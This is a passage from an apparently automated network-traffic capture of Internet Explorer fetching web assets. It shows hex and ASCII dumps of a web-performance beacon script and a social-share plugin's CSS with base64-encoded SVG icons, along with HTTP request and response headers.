                                                                                              2021-12-13 23:57:32 UTC8434INData Raw: 6c 6c 3b 76 61 72 20 74 3d 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 76 61 6c 75 65 3e 74 2e 76 61 6c 75 65 3f 65 3a 74 7d 29 3b 69 66 28 74 26 26 74 2e 73 6f 75 72 63 65 73 26 26 74 2e 73 6f 75 72 63 65 73 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 74 2e 73 6f 75 72 63 65 73 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 6e 6f 64 65 26 26 65 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 77 69 64 74 68 2a 65 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 68 65 69 67 68 74 3e 74 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 77 69 64 74 68 2a 74 2e 70 72 65 76 69 6f 75 73 52 65 63 74 2e 68 65 69 67 68 74 3f 65 3a 74 7d 29 3b 69 66 28 6e 29 72 65 74 75 72 6e 20
                                                                                              Data Ascii: ll;var t=e.reduce(function(e,t){return e&&e.value>t.value?e:t});if(t&&t.sources&&t.sources.length){var n=t.sources.reduce(function(e,t){return e.node&&e.previousRect.width*e.previousRect.height>t.previousRect.width*t.previousRect.height?e:t});if(n)return
                                                                                              2021-12-13 23:57:32 UTC8435INData Raw: 6e 2e 72 65 73 6f 75 72 63 65 73 3d 5b 5d 29 2c 6b 26 26 30 3d 3d 3d 74 26 26 28 6d 2e 70 75 73 68 28 7b 69 64 3a 6e 2e 70 61 67 65 6c 6f 61 64 49 64 2c 75 72 6c 3a 6e 2e 6c 6f 63 61 74 69 6f 6e 7d 29 2c 6d 2e 6c 65 6e 67 74 68 3e 33 26 26 6d 2e 73 68 69 66 74 28 29 29 2c 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 28 22 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 21 31 2c 41 29 2c 76 6f 69 64 20 30 21 3d 3d 67 2e 66 6f 72 77 61 72 64 26 26 76 6f 69 64 20 30 21 3d 3d 67 2e 66 6f 72 77 61 72 64 2e 75 72 6c 26 26 6f 2e 73 65 6e 64 4f 62 6a 65 63 74 42 65 61 63 6f 6e 28 22 22 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 21 31 2c 67 2e 66 6f 72 77 61 72 64 2e 75 72 6c 29 29 7d 2c 6e 3d 64 28 65 29 3b 69 66 28 6e 26 26 67 29 7b 76 61 72 20
                                                                                              Data Ascii: n.resources=[]),k&&0===t&&(m.push({id:n.pageloadId,url:n.location}),m.length>3&&m.shift()),o.sendObjectBeacon("",n,function(){},!1,A),void 0!==g.forward&&void 0!==g.forward.url&&o.sendObjectBeacon("",n,function(){},!1,g.forward.url))},n=d(e);if(n&&g){var
                                                                                              2021-12-13 23:57:32 UTC8436INData Raw: 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 69 7c 7c 28 74 2e 73 69 74 65 54 6f 6b 65 6e 26 26 74 2e 76 65 72 73 69 6f 6e 73 2e 66 6c 3f 22 2f 63 64 6e 2d 63 67 69 2f 72 75 6d 3f 22 2b 65 3a 22 2f 63 64 6e 2d 63 67 69 2f 62 65 61 63 6f 6e 2f 70 65 72 66 6f 72 6d 61 6e 63 65 3f 22 2b 65 29 2c 61 3d 21 30 3b 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 74 72 79 7b 76 61 72 20 63 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 43 68 72 6f 6d 65 5c 2f 28 5b 30 2d 39 5d 2b 29 2f 29 3b 63 26 26 63 5b 30 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3e 2d 31 26 26 70 61 72 73
                                                                                              Data Ascii: null);var o=i||(t.siteToken&&t.versions.fl?"/cdn-cgi/rum?"+e:"/cdn-cgi/beacon/performance?"+e),a=!0;if(navigator&&"string"==typeof navigator.userAgent)try{var c=navigator.userAgent.match(/Chrome\/([0-9]+)/);c&&c[0].toLowerCase().indexOf("chrome")>-1&&pars
                                                                                              2021-12-13 23:57:32 UTC8438INData Raw: 6e 2c 21 30 29 29 29 7d 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 6e 2c 21 30 29 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 68 69 64 65 22 2c 6e 2c 21 30 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 70 61 67 65 73 68 6f 77 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 65 72 73 69 73 74 65 64 26 26 65 28 74 29 7d 2c 21 30 29 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 74 2e 76 61 6c 75 65 3e 3d 30 26 26 28 69 7c 7c 6e 29 26 26 28 74 2e 64 65 6c 74 61 3d 74 2e 76 61 6c 75 65 2d 28 72 7c 7c 30 29 2c 28 74 2e 64
                                                                                              Data Ascii: n,!0)))};addEventListener("visibilitychange",n,!0),addEventListener("pagehide",n,!0)},f=function(e){addEventListener("pageshow",function(t){t.persisted&&e(t)},!0)},d=function(e,t,n){var r;return function(i){t.value>=0&&(i||n)&&(t.delta=t.value-(r||0),(t.d
                                                                                              2021-12-13 23:57:32 UTC8439INData Raw: 28 72 2c 69 2c 74 29 2c 75 28 66 75 6e 63 74 69 6f 6e 28 29 7b 70 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 2e 6d 61 70 28 6c 29 2c 6e 28 21 30 29 7d 29 2c 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 3d 30 2c 68 3d 2d 31 2c 69 3d 63 28 22 43 4c 53 22 2c 30 29 2c 6e 3d 64 28 72 2c 69 2c 74 29 7d 29 29 7d 2c 53 3d 7b 70 61 73 73 69 76 65 3a 21 30 2c 63 61 70 74 75 72 65 3a 21 30 7d 2c 54 3d 6e 65 77 20 44 61 74 65 2c 45 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 7c 7c 28 72 3d 74 2c 69 3d 65 2c 6f 3d 6e 65 77 20 44 61 74 65 2c 4c 28 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 2c 62 28 29 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 3e 3d 30 26 26 69 3c 6f 2d 54 29 7b 76 61 72 20 65 3d 7b 65 6e 74 72 79 54 79 70 65 3a 22 66
                                                                                              Data Ascii: (r,i,t),u(function(){p.takeRecords().map(l),n(!0)}),f(function(){o=0,h=-1,i=c("CLS",0),n=d(r,i,t)}))},S={passive:!0,capture:!0},T=new Date,E=function(e,t){r||(r=t,i=e,o=new Date,L(removeEventListener),b())},b=function(){if(i>=0&&i<o-T){var e={entryType:"f
                                                                                              2021-12-13 23:57:32 UTC8440INData Raw: 75 6c 2d 70 61 69 6e 74 22 2c 6f 29 3b 69 66 28 61 29 7b 6e 3d 64 28 65 2c 69 2c 74 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4f 2e 68 61 73 28 69 2e 69 64 29 7c 7c 28 61 2e 74 61 6b 65 52 65 63 6f 72 64 73 28 29 2e 6d 61 70 28 6f 29 2c 61 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 2c 4f 2e 61 64 64 28 69 2e 69 64 29 2c 6e 28 21 30 29 29 7d 3b 5b 22 6b 65 79 64 6f 77 6e 22 2c 22 63 6c 69 63 6b 22 5d 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 6c 2c 7b 6f 6e 63 65 3a 21 30 2c 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 29 2c 75 28 6c 2c 21 30 29 2c 66 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 3d 63 28 22 4c 43 50 22 29 2c 6e 3d 64 28 65 2c 69 2c 74 29 2c 72 65 71 75 65 73 74
                                                                                              Data Ascii: ul-paint",o);if(a){n=d(e,i,t);var l=function(){O.has(i.id)||(a.takeRecords().map(o),a.disconnect(),O.add(i.id),n(!0))};["keydown","click"].forEach(function(e){addEventListener(e,l,{once:!0,capture:!0})}),u(l,!0),f(function(r){i=c("LCP"),n=d(e,i,t),request
                                                                                              2021-12-13 23:57:32 UTC8442INData Raw: 72 79 70 74 6f 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 2e 62 69 6e 64 28 6d 73 43 72 79 70 74 6f 29 3b 69 66 28 72 29 7b 76 61 72 20 69 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 69 29 2c 69 7d 7d 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 65 77 20 41 72 72 61 79 28 31 36 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 30 3b 74 3c 31 36 3b 74 2b 2b 29 30 3d 3d 28 33 26 74 29 26 26 28 65 3d 34 32 39 34 39 36 37 32 39 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 6f 5b 74 5d 3d 65 3e 3e 3e 28 28 33 26 74 29 3c 3c 33 29 26 32 35 35 3b 72 65 74 75 72 6e 20 6f 7d 7d 7d 2c 66 75 6e 63 74 69 6f
                                                                                              Data Ascii: rypto.getRandomValues.bind(msCrypto);if(r){var i=new Uint8Array(16);e.exports=function(){return r(i),i}}else{var o=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),o[t]=e>>>((3&t)<<3)&255;return o}}},functio


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              15192.168.2.349776104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8378OUTGET /css/websetnet.net/wp-content/plugins/sassy-social-share/admin/css/sassy-social-share-svg.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8442INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a66c3e693f-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"0d61a9dfa8898ada7f4638974c52a43de9bea5529f43b5c9515abefa89ad51c3"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga13626-LGA, cache-fra19142-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8443INData Raw: 37 63 62 35 0d 0a 2e 68 65 61 74 65 6f 72 53 73 73 59 75 6d 6d 6c 79 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 43 41 7a 4d 43 49 2b 50 48 42 68 64 47 67 67 63 33 52 79 62 32 74 6c 50 53 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4d 54 41 75 4e 53 41 78 4d 48 45 30 4c 54 49 67 4d 69 34 31 49 44 46 73 4c 54 45 67 4e 48 45 77 49 44 49 67 4e 53 41 77 62 44 45 74 4e 69 34 31 54 54 45 33 49 44 45 31 62 43 30 78 49 44
                                                                                              Data Ascii: 7cb5.heateorSssYummlySvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMCAzMCI+PHBhdGggc3Ryb2tlPSIjZmZmIiBkPSJNMTAuNSAxMHE0LTIgMi41IDFsLTEgNHEwIDIgNSAwbDEtNi41TTE3IDE1bC0xID
                                                                                              2021-12-13 23:57:32 UTC8444INData Raw: 32 55 39 49 69 4e 6d 5a 6d 59 69 49 47 51 39 49 6b 30 78 4e 53 41 32 49 44 55 67 4d 54 46 73 4d 54 41 67 4e 53 41 78 4d 43 30 31 65 69 49 67 63 33 52 79 62 32 74 6c 4c 58 64 70 5a 48 52 6f 50 53 49 77 49 69 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 69 38 2b 50 48 42 68 64 47 67 67 63 33 52 79 62 32 74 6c 50 53 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4e 53 34 31 49 44 45 30 4c 6a 56 73 4f 53 34 31 49 44 55 67 4f 53 34 31 4c 54 56 74 4c 54 45 35 49 44 51 67 4f 53 34 31 49 44 55 67 4f 53 34 31 4c 54 55 69 49 48 4e 30 63 6d 39 72 5a 53 31 33 61 57 52 30 61 44 30 69 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 76 50 6a 77 76 63 33 5a 6e 50 67 3d 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65
                                                                                              Data Ascii: 2U9IiNmZmYiIGQ9Ik0xNSA2IDUgMTFsMTAgNSAxMC01eiIgc3Ryb2tlLXdpZHRoPSIwIiBmaWxsPSIjZmZmIi8+PHBhdGggc3Ryb2tlPSIjZmZmIiBkPSJNNS41IDE0LjVsOS41IDUgOS41LTVtLTE5IDQgOS41IDUgOS41LTUiIHN0cm9rZS13aWR0aD0iMiIgZmlsbD0ibm9uZSIvPjwvc3ZnPg==) no-repeat center center}.heate
                                                                                              2021-12-13 23:57:32 UTC8445INData Raw: 4c 54 45 78 49 44 59 74 4d 54 45 74 4e 6e 59 74 4d 57 30 77 49 44 49 67 4d 54 45 67 4e 69 41 78 4d 53 30 32 64 6a 45 78 61 43 30 79 4d 6c 59 78 4d 79 49 67 63 33 52 79 62 32 74 6c 4c 58 64 70 5a 48 52 6f 50 53 49 78 49 69 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 46 6c 6f 61 74 69 74 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49
                                                                                              Data Ascii: LTExIDYtMTEtNnYtMW0wIDIgMTEgNiAxMS02djExaC0yMlYxMyIgc3Ryb2tlLXdpZHRoPSIxIiBmaWxsPSIjZmZmIi8+PC9zdmc+) no-repeat center center}.heateorSssFloatitSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciI
                                                                                              2021-12-13 23:57:32 UTC8446INData Raw: 75 4e 54 63 30 4c 54 51 75 4e 54 63 33 65 69 49 76 50 6a 77 76 5a 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 4c 69 6e 6b 65 64 69 6e 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 79 49 43 30 79 49 44 4d 31 49 44 4d 35 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4e 69 34 79 4d 6a 63 67 4d 54 49 75 4e 6a 46 6f 4e 43 34 78 4f 58 59
                                                                                              Data Ascii: uNTc0LTQuNTc3eiIvPjwvZz48L3N2Zz4=) no-repeat center center}.heateorSssLinkedinSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii0yIC0yIDM1IDM5Ij48cGF0aCBkPSJNNi4yMjcgMTIuNjFoNC4xOXY
                                                                                              2021-12-13 23:57:32 UTC8448INData Raw: 55 74 4f 53 34 30 4e 44 49 67 4f 43 34 79 4e 54 4d 75 4d 43 41 79 4c 6a 49 33 4d 69 34 34 4e 69 41 30 4c 6a 49 35 4d 79 41 79 4c 6a 63 77 4e 53 41 31 4c 6a 41 30 4e 69 34 7a 4d 44 4d 75 4d 54 49 31 4c 6a 55 33 4e 43 34 77 4d 44 55 75 4e 6a 59 79 4c 53 34 7a 4d 79 34 77 4e 6a 45 74 4c 6a 49 7a 4d 53 34 79 4d 44 55 74 4c 6a 67 78 4e 69 34 79 4e 79 30 78 4c 6a 41 32 4c 6a 41 34 4f 43 30 75 4d 7a 4d 78 4c 6a 41 31 4d 79 30 75 4e 44 51 33 4c 53 34 78 4f 54 45 74 4c 6a 63 7a 4e 69 30 75 4e 54 4d 79 4c 53 34 32 4d 6a 63 74 4c 6a 67 33 4d 79 30 78 4c 6a 51 7a 4f 53 30 75 4f 44 63 7a 4c 54 49 75 4e 54 6b 78 4c 6a 41 74 4d 79 34 7a 4d 7a 67 67 4d 69 34 30 4f 54 67 74 4e 69 34 7a 4d 6a 63 67 4e 69 34 31 4d 44 55 74 4e 69 34 7a 4d 6a 63 67 4d 79 34 31 4e 44 67 75 4d
                                                                                              Data Ascii: UtOS40NDIgOC4yNTMuMCAyLjI3Mi44NiA0LjI5MyAyLjcwNSA1LjA0Ni4zMDMuMTI1LjU3NC4wMDUuNjYyLS4zMy4wNjEtLjIzMS4yMDUtLjgxNi4yNy0xLjA2LjA4OC0uMzMxLjA1My0uNDQ3LS4xOTEtLjczNi0uNTMyLS42MjctLjg3My0xLjQzOS0uODczLTIuNTkxLjAtMy4zMzggMi40OTgtNi4zMjcgNi41MDUtNi4zMjcgMy41NDguM
                                                                                              2021-12-13 23:57:32 UTC8449INData Raw: 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 52 65 64 64 69 74 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 7a 4c 6a 55 67 4c 54 4d 75 4e 53 41 7a 4f 53 41 7a 4f 53 49 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 49 34 4c 6a 55 30 4d 79 41 78 4e 53 34 33 4e 7a 52 68 4d 69 34 35 4e 54 4d 67 4d 69 34 35 4e 54 4d 75 4d 43 41 77 49 44 41 74 4d 69 34 35 4e 54 45 74 4d 69 34 35 4e 44 6b 67 4d 69 34 34 4f 44 49 67 4d 69 34 34 4f
                                                                                              Data Ascii: center}.heateorSssRedditSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii0zLjUgLTMuNSAzOSAzOSI+PHBhdGggZD0iTTI4LjU0MyAxNS43NzRhMi45NTMgMi45NTMuMCAwIDAtMi45NTEtMi45NDkgMi44ODIgMi44O
                                                                                              2021-12-13 23:57:32 UTC8450INData Raw: 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 79 49 43 30 79 49 44 4d 32 49 44 4d 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4d 6a 41 75 4e 7a 63 31 49 44 49 78 4c 6a 6b 32 4d 6d 4d 74 4c 6a 4d 33 4c 6a 45 33 4e 79 30 78 4c 6a 41 34 4c 6a 4d 7a 4c 54 45 75 4e 6a 45 75 4d 7a 51 31 4c 54 45 75 4e 54 6b 34 4c 6a 41 30 4d 79 30 78 4c 6a 6b 77 4e 79 30 78 4c 6a 45 79 4d 69 30 78 4c 6a 6b 79 4c 54 45 75 4f 54 59 34 64 69 30 32 4c 6a 49 78 4e 32 67 30 4c 6a 41 77 4e 31 59 78 4d 53 34 78 53 44 45 33 4c 6a 49 32 56 6a 59 75 4d 44 4a 6f 4c 54 49 75 4f 54 49 31 63
                                                                                              Data Ascii: N2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii0yIC0yIDM2IDM2Ij48cGF0aCBmaWxsPSIjZmZmIiBkPSJNMjAuNzc1IDIxLjk2MmMtLjM3LjE3Ny0xLjA4LjMzLTEuNjEuMzQ1LTEuNTk4LjA0My0xLjkwNy0xLjEyMi0xLjkyLTEuOTY4di02LjIxN2g0LjAwN1YxMS4xSDE3LjI2VjYuMDJoLTIuOTI1c
                                                                                              2021-12-13 23:57:32 UTC8452INData Raw: 7a 6b 31 4c 54 45 75 4e 54 59 67 4d 69 34 30 4e 54 55 74 4d 69 34 31 4e 58 6f 69 49 47 5a 70 62 47 77 39 49 69 4e 6d 5a 6d 59 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 56 6b 6f 6e 74 61 6b 74 65 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 75 4e 7a 55 67 4c 54 45 75 4e 53 41 7a 4e 43 41 7a 4e 43 49 2b 50 48 42 68 64 47 67 67
                                                                                              Data Ascii: zk1LTEuNTYgMi40NTUtMi41NXoiIGZpbGw9IiNmZmYiLz48L3N2Zz4=) no-repeat center center}.heateorSssVkontakteSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii0uNzUgLTEuNSAzNCAzNCI+PHBhdGgg
                                                                                              2021-12-13 23:57:32 UTC8453INData Raw: 34 30 4e 69 41 31 4c 6a 63 31 4e 79 41 31 4c 6a 49 30 4e 53 41 34 4c 6a 59 31 4e 32 4d 79 4c 6a 55 31 4d 79 41 79 4c 6a 59 32 49 44 55 75 4e 44 55 30 49 44 49 75 4e 44 67 31 49 44 55 75 4e 44 55 30 49 44 49 75 4e 44 67 31 65 69 49 76 50 6a 77 76 63 33 5a 6e 50 67 3d 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 58 69 6e 67 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69
                                                                                              Data Ascii: 40NiA1Ljc1NyA1LjI0NSA4LjY1N2MyLjU1MyAyLjY2IDUuNDU0IDIuNDg1IDUuNDU0IDIuNDg1eiIvPjwvc3ZnPg==) no-repeat center center}.heateorSssXingSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii
                                                                                              2021-12-13 23:57:32 UTC8454INData Raw: 75 4e 54 55 33 4c 54 49 75 4d 6a 67 31 4c 53 34 31 4f 44 55 74 4c 6a 45 34 4d 79 30 75 4f 54 67 74 4c 6a 41 34 4e 69 30 78 4c 6a 4d 35 4c 6a 51 78 4c 54 45 75 4e 54 49 33 49 44 45 75 4f 44 59 79 4c 54 4d 75 4d 6a 59 67 4d 79 34 30 4f 53 30 31 4c 6a 51 33 4e 69 41 30 4c 6a 55 79 4d 69 30 78 4c 6a 4d 32 4f 43 34 32 4e 43 30 78 4c 6a 4d 32 4f 43 34 32 4e 44 49 74 4d 53 34 35 4e 7a 49 74 4c 6a 59 35 4e 53 30 75 4d 54 63 34 4c 53 34 7a 4f 53 30 75 4d 7a 51 32 4c 53 34 33 4f 44 55 74 4c 6a 55 30 4c 54 45 75 4d 6a 49 32 49 44 45 75 4f 44 49 33 4c 53 34 30 4d 7a 4d 67 4d 79 34 7a 4f 43 30 78 4c 6a 49 30 4e 69 41 30 4c 6a 59 79 4c 54 49 75 4e 6a 49 75 4e 7a 51 74 4c 6a 67 79 4d 69 41 78 4c 6a 45 32 4e 69 30 78 4c 6a 63 78 4e 69 41 78 4c 6a 49 32 4c 54 49 75 4f 44
                                                                                              Data Ascii: uNTU3LTIuMjg1LS41ODUtLjE4My0uOTgtLjA4Ni0xLjM5LjQxLTEuNTI3IDEuODYyLTMuMjYgMy40OS01LjQ3NiA0LjUyMi0xLjM2OC42NC0xLjM2OC42NDItMS45NzItLjY5NS0uMTc4LS4zOS0uMzQ2LS43ODUtLjU0LTEuMjI2IDEuODI3LS40MzMgMy4zOC0xLjI0NiA0LjYyLTIuNjIuNzQtLjgyMiAxLjE2Ni0xLjcxNiAxLjI2LTIuOD
